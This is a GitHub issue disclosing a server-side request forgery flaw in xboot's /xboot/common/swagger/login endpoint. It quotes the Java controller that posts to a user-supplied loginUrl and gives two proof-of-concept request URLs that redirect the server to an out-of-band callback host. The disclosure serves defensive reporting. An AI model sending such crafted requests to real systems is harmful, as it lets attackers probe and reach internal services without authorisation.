Skip to content

SSRF vulnerability on /xboot/common/swagger/login #70

Open
Open
SSRF vulnerability on /xboot/common/swagger/login#70
@NinjaGPT

Description

@NinjaGPT
NinjaGPT
opened on Jul 22, 2025

Summary

A SSRF vulnerability was discovered on the endpoint /xboot/common/swagger/login in latest version (v3.3.4) of xboot. The target URI parameter for network requests is user-controllable and lacks sufficient security processing, resulting in an SSRF vulnerability that allows attackers to exploit this flaw to probe and exploit internal services of the target system.

Details

  • xboot-fast/src/main/java/cn/exrick/xboot/modules/base/controller/common/SecurityController.java
@RestController
@Api(tags = "Security相关接口")
@RequestMapping("/xboot/common")
@Transactional
public class SecurityController {

    @RequestMapping(value = "/needLogin", method = RequestMethod.GET)
    @ApiOperation(value = "没有登录")
    public Result<Object> needLogin() {

        return ResultUtil.error(401, "您还未登录");
    }

    @RequestMapping(value = "/swagger/login", method = RequestMethod.GET)
    @ApiOperation(value = "Swagger接口文档专用登录接口 方便测试")
    public Result<Object> swaggerLogin(@RequestParam String username, @RequestParam String password,
                                       @ApiParam("图片验证码ID") @RequestParam(required = false) String captchaId,
                                       @ApiParam("验证码") @RequestParam(required = false) String code,
                                       @ApiParam("记住密码") @RequestParam(required = false, defaultValue = "true") Boolean saveLogin,
                                       @ApiParam("可自定义登录接口地址")
                                       @RequestParam(required = false, defaultValue = "http://127.0.0.1:8888/xboot/login")
                                               String loginUrl) {

        Map<String, Object> params = new HashMap<>(16);
        params.put("username", username);
        params.put("password", password);
        params.put("captchaId", captchaId);
        params.put("code", code);
        params.put("saveLogin", saveLogin);
        String result = HttpUtil.post(loginUrl, params);
        return ResultUtil.data(result);
    }
}

POC

http://localhost:9999/xboot/common/swagger/login?loginUrl=https://dnslog/&username=x&password=x


http://localhost:9999/xboot/common/swagger/login?loginUrl=https://d1vif4ev0le7bmrt4se0gjs1qcw1a5jgw.oast.me&username=x&password=x
Image

Impact

https://portswigger.net/web-security/ssrf#what-is-the-impact-of-ssrf-attacks

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions